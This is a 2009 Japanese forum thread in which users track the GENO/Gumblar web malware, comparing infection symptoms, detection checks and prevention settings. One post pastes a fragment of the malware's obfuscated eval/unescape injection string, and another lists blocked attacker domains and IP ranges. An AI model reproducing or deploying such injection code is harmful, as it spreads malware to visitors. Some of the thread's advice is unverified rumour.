GENOウイルススレ 感染2台目
at INTERNET
1:192.168.0.774
09/05/18 16:09:23 BZ5+cjSr0
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
URLリンク(anubis.iseclab.org)
★GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
★このサイトは諸事情により内容を書き換え
URLリンク(www3.atword.jp)
前スレ
GENOウイルススレ
スレリンク(internet板)
2:192.168.0.774
09/05/18 16:10:00 BZ5+cjSr0
感染予防対策
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例
1.Adobe Readerを起動し「編集」メニューの「環境設定」
「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
OKを押して設定確定後、Adobe Readerを終了。
↓
2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
設定は SpeedUp - Fast がおすすめ。
注意すべきは
Acroform(拡張子なし)
Annotations(拡張子なし)
これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
そうしないと Adobe Reader が起動しなかったりする。
このとき追加作業として
EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
より安心かもしれない。
以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
3:192.168.0.774
09/05/18 16:10:43 BZ5+cjSr0
以下攻撃されたサイト
小林製薬
URLリンク(www.kobayashi.co.jp)
国内の正規サイト改ざん:攻撃サイトを変え再襲来
URLリンク(www.so-net.ne.jp)
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
4:192.168.0.774
09/05/18 16:11:11 BZ5+cjSr0
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
URLリンク(www3.atword.jp)
5:192.168.0.774
09/05/18 16:11:47 ua7Ctj4Z0
>>1
テンプレの症状にある「再起動時にBSOD」は、起動時にLANケーブルが抜かれていたり、IPブロックされていると
攻撃者のIPに繋がらないため、クラッシュさせる挙動だそうです。
6:192.168.0.774
09/05/18 16:11:50 BZ5+cjSr0
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
7:192.168.0.774
09/05/18 16:12:22 wsKEiiw60
【感染の確認方法】■ Windows XP(5月18日現在)
1 C:\WINDOWS\system32\sqlsodbc.chmを開いて壊れていたら感染濃厚
2 ↑のファイルサイズを確認する
正常値 日本語版ヘルプ 50,727 bytes
英語版ヘルプ 46133
ドイツ語ヘルプ 48401
フランス語ヘルプ 49345
スペイン語ヘルプ 48475
改竄されたsqlsodbc.chmの一例
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
:
8:192.168.0.774
09/05/18 16:14:07 IfMEin9r0
Aviraたん何か更新きた
Virus definition file 7.01.03.218 2009/05/18
9:192.168.0.774
09/05/18 16:15:58 BZ5+cjSr0
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。
初心者や質問がある方は
スレリンク(doujin板)
上記のスレに行くと優しく教えてくれるかもです
Adobe Flash Player バージョンテスト
URLリンク(www.adobe.com)
改竄されたsqlsodbc.chmは
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
正常な場合50,727バイト(日本語)です。
10:192.168.0.774
09/05/18 16:16:46 EMdE+yZc0
仕事行って来たんだけど、昨日の夜から何か出来事あった?
11:192.168.0.774
09/05/18 16:17:04 k2CI1leb0
>>1
スレ立て乙。
ちとしばらく潜るわ。
動作が不安定になる種も探したいし。
12:192.168.0.774
09/05/18 16:17:32 BZ5+cjSr0
>>7
VistaUltimateでは多言語での利用が可能ですが、複数sqlsodbc.chmが存在する場合はインストール済みの言語分存在する・・・かもしれません。
13:192.168.0.774
09/05/18 16:23:05 HT0KAN7x0
>>1乙
同人板は既に8スレ目であり、現状スレタイで質問禁止になっている
14:192.168.0.774
09/05/18 16:23:43 wU1qChfhP
>>1 乙
情報多すぎて混乱してる人は、とにもかくにもAdobe製ツールを最新に
ブラウザ毎に最新にするんだぞ
15:7
09/05/18 16:23:55 wsKEiiw60
>>12
とりあえずXPだけまとめてみた
cmdもregeditも無問題でスキャンもすり抜けらしいので
vistaの改変例てどこかありましたか?
あと2kの判定方法も
16:192.168.0.774
09/05/18 16:25:04 ZMLDN5880
>>13
何故かスレタイは無視して良いってことになってる。
17:192.168.0.774
09/05/18 16:26:57 JmCcr4Q60
>>15
sqlsodbc.chmだがテンプレだと2kには無いってあるが家の2kSP4の奴には>7の英字版ヘルプと同サイズのが入ってた
だからこれも環境依存、かねぇ?
18:192.168.0.774
09/05/18 16:28:56 +m52NSIq0
乙なんじゃないのかな
19:192.168.0.774
09/05/18 16:29:01 duGXzOvm0
>>17
感染すると2kにもsqlsodbc.chmが出来るって聞きましたが
20:192.168.0.774
09/05/18 16:29:13 eM8L/6820
>>1 乙です
間違って zlkonウイルス擦れ 行ってたw
21:192.168.0.774
09/05/18 16:30:26 2R5fa0YFP
火狐の先読みって切らなくても大丈夫なん?
22:192.168.0.774
09/05/18 16:30:30 eOHkXG3n0
>>5
起動時にLANケーブルがついていたり
IPブロックされていなければ、
攻撃者のIPにつながるから、クラッシュさせる挙動をとらない
ということになるの?
23:192.168.0.774
09/05/18 16:33:41 JmCcr4Q60
>>19
あぁ、普段ネットワークに繋いでない非常時起動用の奴(ウィンアプデとかの時だけ繋ぐ)なんで
感染して作られたっつー可能性は低い、と思う(ヘルプとして開くしね)
24:192.168.0.774
09/05/18 16:35:50 8wGPADB70
★GENOウイルスまとめ
URLリンク(www29.atwiki.jp)
★このサイトは諸事情により内容を書き換え
URLリンク(www3.atword.jp)
これって上が正しいの?
もうまとめすら見るのが怖いんだが
25:192.168.0.774
09/05/18 16:38:13 k2CI1leb0
>>17
Windows 2000には標準では存在しない。
標準ではsqlsodbc.hlpしかない。
Visual StudioやMSDE、MSSQLをインストールすると入ると思う。
あるいはMDAC(Microsoft Data Access Components)をインストールしても
入る。
動作が不安定になる種が落ちてこないなぁ。
26:192.168.0.774
09/05/18 16:38:28 8UXA7HKu0
2kだけど
C:\WINDOWS
これがまずないんだがフォルダごと作られるってこと?
C:\WINNT\system32になら
sqlsodbc.hlpとsqlsodbc.GIDてのあったからかわりにここに作られる?
27:192.168.0.774
09/05/18 16:39:22 eM8L/6820
>>24
どちらも安全
28:192.168.0.774
09/05/18 16:40:36 +m52NSIq0
>>21
切っておこうぜ
29:192.168.0.774
09/05/18 16:41:44 +m52NSIq0
>>26
おっしゃるとおり、2kの場合はC:\WINDOWSを
C:\WINNTとして置き換えないといけない
30:192.168.0.774
09/05/18 16:42:08 8wGPADB70
>>27
ありがと
早くノートン対応してほしい・・・おちおちネットもしてられないなんて
31:192.168.0.774
09/05/18 16:42:25 k2CI1leb0
>>26
作られるとしたら、%Windir%のC:\WinNT以下のフォルダのはず。
32:192.168.0.774
09/05/18 16:42:47 JmCcr4Q60
>>25
あぁ仕事用としても使えるように当初作ったからその辺入ってるな。安心した
>>26
win2kの場合WINNTがデフォルト(NTの名残)XPになってWINDOWSがデフォルトに(Win95系終焉して統合したから)
なのでXPで\WINDOWS〜って時は2kだと\WINNT〜と読み替えるのが基本
33:192.168.0.774
09/05/18 16:47:11 8UXA7HKu0
>>29,31,32
なるほど
ありがとうございます
34:192.168.0.774
09/05/18 16:47:20 k2CI1leb0
>>32
ちなみにMDAC 2.8日本語版のsqlsodbc.chmのサイズは50,727 バイト(2003/06/27 17:06:44)
だった。
35:192.168.0.774
09/05/18 16:55:40 8GKrEP5/O
手書きブログ感染って本当?
ウイルスチェッカーでは調べることが出来ないんでわかる人居たら教えて
36:192.168.0.774
09/05/18 16:56:46 k2CI1leb0
>>5
これ試してみたけど、今飼ってるおとなしい奴はネットワークアダプタ
殺したり、ケーブル抜いたりしても普通に立ち上がるな。
37:192.168.0.774
09/05/18 16:56:53 rNK1DQEo0
>>35
チェッカーにかけなくてもソース見ればいいと思うよ
38:192.168.0.774
09/05/18 16:59:00 trRzScO50
FirefoxでAdblockPlus使ってるんだけど、気休めにフィルタ追加してみた
これで利くのかな?
*/94.229.[64-79].[0-255]/*
*/94.247.[2-3].[0-255]/*
*/95.129.[144-145].[0-255]/*
gumblar.cn
zlkon.lv
martuz.cn
bigtopsuper.cn
findyourbigwhy.cn
39:192.168.0.774
09/05/18 16:59:28 +lw3mpsu0
>>36
怖すぎるだろそれ…
まだ絶対クラッシュしてくれる方がありがたい。
自分が感染しているかどうか確証が持てない方が怖すぎる。
40:192.168.0.774
09/05/18 17:00:56 k2CI1leb0
>>35
google-analyticsの呼び出しでunescape使ってるから誤検知したんじゃないかな?
41:192.168.0.774
09/05/18 17:00:59 8GKrEP5/O
>>37
ざっとソースみても疑わしいものはなかったよ
それに手書きブログ踏んでみたけどavastたん反応しなかったし
詳しい人まじ詳細おね
42:192.168.0.774
09/05/18 17:01:50 s8PVU+vD0
>>1に書いてある症状でこのスレで追試できたのをまとめて欲しいな。
43:192.168.0.774
09/05/18 17:02:40 3Wf1BgQ0O
>>35
リンク集の方にURL載ってるが詳しくはわからん
報告ありしか書いてないからガセの可能性高い
44:192.168.0.774
09/05/18 17:04:18 7k/9HGtp0
>>37
前使ったことあって気になったから調べてみたけどchromeもavastも怒らない
jsファイル含め怪しい箇所もない
やっぱりgoogleのタグ誤検知かと
45:192.168.0.774
09/05/18 17:05:23 rNK1DQEo0
>>41
出たのがVIPで誰も相手にしてない感じだしガセなんじゃない?
手ブロのスレッドでも誰も何も言ってないし
46:192.168.0.774
09/05/18 17:05:25 7k/9HGtp0
安価ミス
>>44は>>37じゃなくて>>41ね
47:192.168.0.774
09/05/18 17:06:07 8GKrEP5/O
>>40
誤検知かな・・・誤検知だったらいいんだが
>>43
本当にガセなのかわかればいいんだがあいにく私は調べ方わからんからなあ・・
>>44
やっぱりそうなのかな
とりあえず様子見てみることにするよ
48:192.168.0.774
09/05/18 17:08:45 F+zztV0c0
手ブロ見に行ってみたけどavastは暴走しなかったな
普通に見れるしソースもそんなおかしいのないしガセっぽいね
49:192.168.0.774
09/05/18 17:09:22 wU1qChfhP
>>35
ぱっと見では大丈夫そう
どうでもいいけど、そこソースが割と綺麗だな
ある程度手打ちで書いたのか
50:192.168.0.774
09/05/18 17:12:35 eM8L/6820
URLリンク(pipa.jp) 怪しいスクリプト入っていません
ガセですね
51:192.168.0.774
09/05/18 17:16:26 hMt5GVQZ0
ネットカフェのPCって再起動したら設定とかもとに戻るんだっけ?
自PCでどこが安全か調べるのが怖いから
ネカフェ行ったほうがいいんだろうか。
52:192.168.0.774
09/05/18 17:16:42 7k/9HGtp0
URLリンク(geno.2ch.tc)
>URLでないと判断されました。
>評価ミス報告
そもそもこのチェッカーがおかしいと思うんだ
どういう風に組んだらこういう結果が出るんだよ
53:35
09/05/18 17:19:15 8GKrEP5/O
みなさん本当にありがとうございます
一応誤検知だということでいいですかね?
因みに>>47は私ですすいません
パソコンからじゃ書き込めないんで携帯から失礼しました
54:192.168.0.774
09/05/18 17:19:38 PGXf1oVHO
>>51
感染したらどうするつもり?
55:192.168.0.774
09/05/18 17:19:40 Anj4hR3G0
>>52
それを組んだのはセキュ板の方?
56:192.168.0.774
09/05/18 17:23:05 kh9I2kSv0
>>52
やってみたけど
診断できるぞ?
>危険度0%
>安全なURLです。踏んでも大丈夫でしょう。
誰か評価ミス送ったのかな?
57:192.168.0.774
09/05/18 17:25:00 eM8L/6820
【鑑定目的禁止】検出可否報告スレ10 より転載
gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
58:192.168.0.774
09/05/18 17:30:38 R2ICsyNGO
感染してるサイトをこのチェッカーで調べても
なんも出てこないの俺だけ?
59:192.168.0.774
09/05/18 17:34:30 wU1qChfhP
使ってないから知らんけど、チェックしてるページが違うとか
60:192.168.0.774
09/05/18 17:37:01 DC1VgNqQ0
俺もやってみたけど0%だった
昨日の成美堂はちゃんとなったんだけどな
61:192.168.0.774
09/05/18 17:38:55 k2CI1leb0
>>5
別の種で試してみたら、再現した。
前の種で再現しなかったのは、いったんmartuz.cnに接続して
アクティブになったら発動しないってことなのかも??
62:192.168.0.774
09/05/18 17:40:44 R2ICsyNGO
鳥骨鶏とかリボンマジックが0になる
63:60
09/05/18 17:40:56 DC1VgNqQ0
あ、ごめんちゃんとなった
64:192.168.0.774
09/05/18 17:41:26 eM8L/6820
烏骨鶏やっとサイト閉じたな
65:192.168.0.774
09/05/18 17:45:06 lbjdJxFz0
確認する際は、キャッシュをしっかり削除してから。
とりあえず、ここまでF-Secure SASからの回答なし。
今夜くらいから動いてくれるのかね…今10時くらいだと思うし。
66:192.168.0.774
09/05/18 17:47:13 j9Y4xggD0
>980 192.168.0.774 sage 2009/05/18(月) 15:27:48 ID:gw0F+TVl0
>通称「GENOウイルス」・同人サイト向け対策まとめ
>URLリンク(www31.atwiki.jp)
>にある
>ウイルスバスター2009(ver.17.1.1251)のファイアウォール設定
>ですが
>URLリンク(esupport.trendmicro.co.jp)
>の注意書きにある ・・・
もう一度読み直してみるとGENOウイルスの動作では
同人サイトのファイアウォールの設定は危険ではないか
その設定をよく見ると、
例外ルール(プロトコル)のみの設定しかなく
例外ルール(プログラム)側のInternet Explorerのデフォルトが全て許可なので
実際に試したわけでないが、そこから抜けると思われ
67:192.168.0.774
09/05/18 17:50:55 lbjdJxFz0
>>48
おそらく unescapeの文字を見かけて危険と判断したと思われ。
…といっても、google-analytics.com のアクセス解析のみで、問題となるコードが無いか目視で確認しましたが、特に見当たりません。
68:192.168.0.774
09/05/18 17:52:30 ua7Ctj4Z0
>>6
>Bavast!(無料のアンチウイルスソフト)で確認
だから、そこ消して!!
Avastは、スクリプトが仕込まれたページの大半(反応しないものも確認されています)で反応しますが
落ちてきた本体に感染しているかどうかのチェックには使えません。
69:192.168.0.774
09/05/18 17:57:46 mHe74bNo0
URLリンク(www.so-net.ne.jp)
ここのニュースを読むと犯人は中国のドメイン名だが、
サイトはロシアでホストに移動して活動しているとあるけど
この大元から犯人が捕まる可能性ってどのぐらいなんだ?
ウイルス作って逮捕されたやつ沢山いるが日本県警じゃムリだろうか
70:192.168.0.774
09/05/18 17:58:16 5fyyAw/a0
GenoVirus感染サイトリストで、感染の疑いがあるサイトのalfa-radio●comは、
ソース見る限り感染してるように見えないんだがどうだろう?
71:192.168.0.774
09/05/18 18:00:00 dFHP9qyG0
>>69
海外でも感染広がってるらしいから日本県警より海外の警察に任せたほうがよさそうだな
72:192.168.0.774
09/05/18 18:00:11 eOHkXG3n0
>>59
チェッカーは精度に問題あるから。
73:192.168.0.774
09/05/18 18:01:43 ua7Ctj4Z0
>>70
現時点では感染してる様子はありませんね。ソース見たけど入ってない。
74:192.168.0.774
09/05/18 18:01:47 wEi5/cqd0
なんかテンプレが古いな
gumblar.cnとかavastとかNoScriptとか
新種はmartuz.cn
avastは>>68
Fxを使用していてもNoScriptを使用する必要はないし
ブラウザもFxである必要はない
というかブラウザ依存のウイルスではないので
ブラウザを指定する必要はない。
ちょろめだけJSをオフれないということなのでそこだけ注意すればいいかと
75:192.168.0.774
09/05/18 18:01:55 JmCcr4Q60
>>69
中国、ロシア辺りだとおそらく無理だろなぁ…
ネトゲの垢ハックとかで被害届出してゲーム運営がログ提供しても最終的に中国とかロシアとかその手の方面で
追跡不能〜ってなるのがほとんどだそうだ。
76:192.168.0.774
09/05/18 18:02:31 j9Y4xggD0
ノートンのファイアウォールもウイルスバスターより癖が強いから
設定の甘さでファイアウォールをしていてもなんの意味を持たないことにもなる
もう一度下記サイトの各種設定を見直す必要があると思われ
URLリンク(www31.atwiki.jp)
77:192.168.0.774
09/05/18 18:05:50 v6qQswXM0
URLリンク(genolists.alink.uic.to)
ここの管理人の人まだ見てるかな?
リストが増えてきたんで、重複とか、タレコミを受けて閉鎖対処したサイトとか、
あとろくに自力で調べもしない人が噂だけ鵜呑みにして「確定サイト」扱いで登録した白サイトとかあるから
できれば管理人権限で整理してくれると助かります
っていうかちゃんと役に立ってるのかな?このリスト
78:192.168.0.774
09/05/18 18:06:50 FI6RkFNE0
【議論OK】GENOウイルス晒しスレ
スレリンク(doujin板)
79:192.168.0.774
09/05/18 18:07:29 mHe74bNo0
>>71
海外の警察のほうが頼りになるか
そうだな
80:192.168.0.774
09/05/18 18:08:18 eM8L/6820
>>70
私も見ましたけど怪しいスクリプトは無いですね
81:192.168.0.774
09/05/18 18:08:31 EgqX730p0
いっそロシアンマフィアのPCクラッシュさせて消されればいい
82:192.168.0.774
09/05/18 18:10:31 mHe74bNo0
>>75
イギリスに移動したとあるからその辺に期待
アメリカにいかないのは危険だと思っているのだろうかやはり
83:192.168.0.774
09/05/18 18:11:58 wU1qChfhP
>>70
俺も大丈夫だと思うけど、どうだろうな
>>40辺りの理由かも
84:192.168.0.774
09/05/18 18:12:50 eM8L/6820
今回のウイルスは巨大botnetを作るのが目的だとか?
どこかのサイトで見ました。犯罪者集団ですね
85:192.168.0.774
09/05/18 18:14:41 3Wf1BgQ0O
>>77
微妙な所だね
自分でも感染サイト探してるけどなかなか難しい
86:192.168.0.774
09/05/18 18:14:43 KeDzETgR0
>>8
週末に騒ぎが始まってから
ずっと1時間おきくらいにうpだて手動チェックしてるが
ログ見返したら25回くらい更新があった
日本語じゃないせいか全然話題に上らないが
これはちゃんと仕事してくれてると思っていいんだよな?
87:192.168.0.774
09/05/18 18:18:44 yY1zypbb0
>>84
so-net セキュリティ通信
URLリンク(www.so-net.ne.jp)
これだね
88:192.168.0.774
09/05/18 18:22:50 8GKrEP5/O
>>78
avastたん反応したんだが
なにこれ
89:192.168.0.774
09/05/18 18:24:43 lbjdJxFz0
>>88
avastが反応するようなコードが名前欄に貼ってあるから
90:192.168.0.774
09/05/18 18:26:38 gM07vQcn0
>>88
Avastが今回の騒ぎに使われてるJavascriptの一部分をシグニチャとして持ってて、
その文字列を含んでるので反応する。
一時期流行ったLoveLetterの一部貼ってノートン反応するのと一緒。
91:88
09/05/18 18:28:03 8GKrEP5/O
>>89
なんだ・・
URLのよく出来た釣りに引っ掛かったのかと思った
92:192.168.0.774
09/05/18 18:28:07 ivBmAr0O0
>>77
それ編集とか削除するためには登録者のパスワードが必要だよね。
有志が編集できるように共通のパス決めといた方がいいと思うんだが。「geno」とか。
93:192.168.0.774
09/05/18 18:28:43 EMdE+yZc0
>>78
おい専ブラなのにavast怒ったぞ。
スレ一覧全部飛んだじゃねーか死ね
94:192.168.0.774
09/05/18 18:29:17 jHA8BSMo0
なんでこんな深刻な被害ありそうなのに
2chの一部でしか警戒されてないんだ?
今までのウイルスも最初はこんな感じなのかな?
95:192.168.0.774
09/05/18 18:29:51 9chuMM1o0
>>91
専ブラで2ch見てるなら、専ブラのフォルダを除外指定すれば
その手のテキストで書かれただけのソースコードは引っ掛からなくなるよ
96:192.168.0.774
09/05/18 18:30:18 ua7Ctj4Z0
>>84,>>87
こっちのほうがハッキリ書いてある。
URLリンク(www.aladdin.co.jp)'s-weekend.html
97:192.168.0.774
09/05/18 18:30:36 yY1zypbb0
>>94
見た目が派手じゃないから
98:192.168.0.774
09/05/18 18:32:20 TM5Ovwjd0
幼女ウィルスみたいに具体的に何されてるか分からないからなぁ
99:192.168.0.774
09/05/18 18:33:09 v6qQswXM0
>>92
そうなんだよね、登録者or管理者でないと編集・削除が出来ないから
重複や誤報のURLの削除を迅速にするには、それが一番いい
次回からgenoで統一してもらうようにする?
100: ◆f/iQdjPxCM
09/05/18 18:33:35 76hdi/6T0
前スレに引き続き。
もはや当てにはなるまい cmd.exe や regedt32.exe/regedit.exe の起動や、
環境条件依存性の強い sqlsodbc.chm ではなく、
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\
の方から調べてみるアプローチの模索。
まだ試作段階で結果は信用できる段階にありません。
一般的見地からはこれ自体が「不審なEXEファイル」なので、
俺が言うのもなんだけど、一般の人は少なくとも、
玄人が仮想環境等を使って害が無さそうなことを確認してくれるまでは、
手を出さないこと推奨、かね。
想定ターゲットは win2k/xp(32bit).
仮想環境でブツを飼ってる玄人で暇な人はテストにお付き合い頂ければ幸いです。
GENOdetect_v003.LZH
URLリンク(www1.axfc.net)
DLkey: testGENOdetect
GENOenvinfo_v003.LZH
URLリンク(www1.axfc.net)
DLkey: testGENOdetect
SIZE (GENOdetect.exe) = 8192
MD5 (GENOdetect.exe) = f228b8db63dba8175ec6579f8a87c6d7
SHA1 (GENOdetect.exe) = b263461103e693d4ce2be15757ded9ec544821d5
SHA256 (GENOdetect.exe) = 67e3465d9dd8eac015853103d2ec16f58ac78ec3b9cc706476f5dc53b1f49cb3
SHA512 (GENOdetect.exe) = 1ec0ab0588484c4622e37c968619a142c7ff92ce39ed6045dfda7d8294d28eb7443d02e1725793b2ff088e25a2602fc14a072e30d456534dedc271d55047c74e
SIZE (GENOenvinfo.exe) = 9216
MD5 (GENOenvinfo.exe) = cbf1b467b0082b665c95c55f4e090cf8
SHA1 (GENOenvinfo.exe) = 7bf9cba9e1aa4c47e3c035e4077308cb29fd073b
SHA256 (GENOenvinfo.exe) = 3f375b58e6e38ac95c187e9bc9b0cd997d8373be5f5d61913f520c4cf71caa29
SHA512 (GENOenvinfo.exe) = 0171c6a410d10ecc6a1b6c1793f19a9d4f7fd68aac8a1b430da7c6f08e41a7c6a56496d100be50290c75ee95b1edeacb08cb71df0f7f7d6c7da11632f2036d09
detect の方が最終的に一般向けになれれば版、
envinfo の方がdebug目的で GENOenvinfo_log.txt を生成する版。
GENOenvinfo_log.txt はユーザ名(ログオン名)が含まれる場合がありますので、
テストに協力して頂ける等で公開する際にはご注意下さい。
101:192.168.0.774
09/05/18 18:33:59 3VJel2as0
(){eval(unescape(('Script(t,'%')))})(/./g);
この文字列をNGワードにすれば良いのでは?
これはウイルスではありませんので安心してください。
102:192.168.0.774
09/05/18 18:36:05 4ySopLDi0
おい更新したらavastが反応したぞコラ
103:192.168.0.774
09/05/18 18:36:51 ivBmAr0O0
>>99
とりあえず俺が登録するときはパスは「geno」にしときますわ
104:192.168.0.774
09/05/18 18:36:56 8GKrEP5/O
>>99
パスワードを知った愉快犯が変にいじくってしまったらどうする?
105:192.168.0.774
09/05/18 18:37:02 r2xJxp6a0
更新したら心臓止まりそうになったわ
106:192.168.0.774
09/05/18 18:39:48 duvNIOfD0
GENO URLチェッカーは、まだ未完成と・・・・
GENOウィルスツールの検出精度ってどうなんだろ?
107:192.168.0.774
09/05/18 18:40:21 QTaoO352O
スレ更新したら反応したんだけど・・・
マジでやめてくれよ
108:192.168.0.774
09/05/18 18:40:33 enUpbFMt0
統計的に有意性を取ってみたいが検証する暇がない
109:192.168.0.774
09/05/18 18:40:36 bV3w8TeO0
セキュ板の本スレ何なんだ、いつの間にか二桁いってるし
GENO感染時にいたみんなはここに避難したかんじかな?
>>78 のスレ、avastが反応するな
110:192.168.0.774
09/05/18 18:41:40 WUiMUIup0
ここもavast反応するんだが…
111:192.168.0.774
09/05/18 18:42:37 IfMEin9r0
Virus definition file 7.01.03.218 2009/05/18
Virus definition file 7.01.03.219 2009/05/18
Virus definition file 7.01.03.220 2009/05/18
Avira今日だけで3回更新w
112:192.168.0.774
09/05/18 18:42:50 cNzce2cIP
どこのバカだウイルスのコード貼ったの
avastさん激怒でアクセスできなくなったじゃねーか!
113:192.168.0.774
09/05/18 18:43:33 eM8L/6820
>>109
ここに引っ越してますよ^^
114:192.168.0.774
09/05/18 18:43:33 8GKrEP5/O
avastたんかわいいよavastたん
115:192.168.0.774
09/05/18 18:43:48 nYc6GBj10
この程度で騒ぐな情弱ども
116:192.168.0.774
09/05/18 18:44:42 9chuMM1o0
このスレでavastが反応する人は
タスクのavastアイコンクリックして標準シールド→詳細な設定→追加設定タブで
下のところにある除外設定で専ブラのフォルダ指定すれ
117:192.168.0.774
09/05/18 18:44:54 UYH62RHM0
>>101
ウィルスコードだな
このスレまで反応したぞw
2のログでAVASTがうぃーんうぃーんするのは慣れてるからコードとは思ったが
知らない人は驚くな
118:192.168.0.774
09/05/18 18:45:17 3Wf1BgQ0O
>>94
感染してるの気付きにくいから
119:192.168.0.774
09/05/18 18:45:24 7k/9HGtp0
ここの住民はほとんどセキュ板と同じだと思ってたけど違うのな
120:192.168.0.774
09/05/18 18:45:56 wU1qChfhP
単純に文字列追ってるんだな>avast
121:192.168.0.774
09/05/18 18:46:17 ivBmAr0O0
>>104
とりあえず魚拓取っておいた。
このCGIにバックアップ機能があるのかわからないが、
もしないなら定期的に魚拓取っておいてそこから復旧すればいいんでないか
122:192.168.0.774
09/05/18 18:46:26 3Wf1BgQ0O
>>109
もうあっちは隔離スレになったよ
123:192.168.0.774
09/05/18 18:46:28 cNzce2cIP
p2使っている俺はどうすれバインダー
124:192.168.0.774
09/05/18 18:46:39 ua7Ctj4Z0
p://www■mikesquarter■com/
感染確認したが、海外のサイトな上、コンタクトが(感染するスクリプトのあるページの)フォームなので、
サイト管理者への連絡はパス。
125:192.168.0.774
09/05/18 18:47:05 8GKrEP5/O
専ブラじゃないんだが
126:192.168.0.774
09/05/18 18:47:14 bV3w8TeO0
おい、ここもかよ
コード貼るなら無効にしてからはれよ
127:192.168.0.774
09/05/18 18:48:25 lbjdJxFz0
検体スレにも書きましたが、
F-Sercure SAS登録分の回答で、
検体報告のあったmartuz.cn新種(2009/05/17版)については次回DB更新にて対応とのこと。
128:192.168.0.774
09/05/18 18:49:22 nYc6GBj10
ほんと無能やつってジャマだわ
黙って無効化ろよ
129:192.168.0.774
09/05/18 18:53:48 fOCJVXyt0
>>78
うちのアバたんが全く反応しない
130:192.168.0.774
09/05/18 18:56:45 eM8L/6820
URLリンク(genolists.alink.uic.to) ここの鉄道110号のページは確定↓
URLリンク(safebrowsing.clients.google.com)
131:192.168.0.774
09/05/18 18:59:41 EGMN69Mk0
昨日、>>2の感染予防対策 とIEのスプリクトをよく解らないから全部無効にした後
やけにパソコンが重いからタスクマネージャーで調べたら
cmdが勝手に起動
カスペルのアップデートが30分経っても5%
Windows Updateサイトも最終段階で弾かれる
ワンケアも弾かれた
cmdを閉じWindows Updateの指示にしたがい操作したら無事Update終了
常駐させてるカスペルも元に戻った
sqlsodbc.chmのサイズは問題なし。再起動も問題なく出来た
ワンケアのオンラインスキャンだけはまだ出来ない・・・
情弱なので感染してるのかしてないのか謎
132:192.168.0.774
09/05/18 19:01:00 jTJy2IbM0
>>109
向うは早すぎて、時間が無いとついていけない
あっちは流し読みして、こっちをメインの情報源にしてる
133:192.168.0.774
09/05/18 19:01:01 XBZCbjSj0
URLリンク(www.3nell.net)
genoウイルス臨時できてるよ
134:192.168.0.774
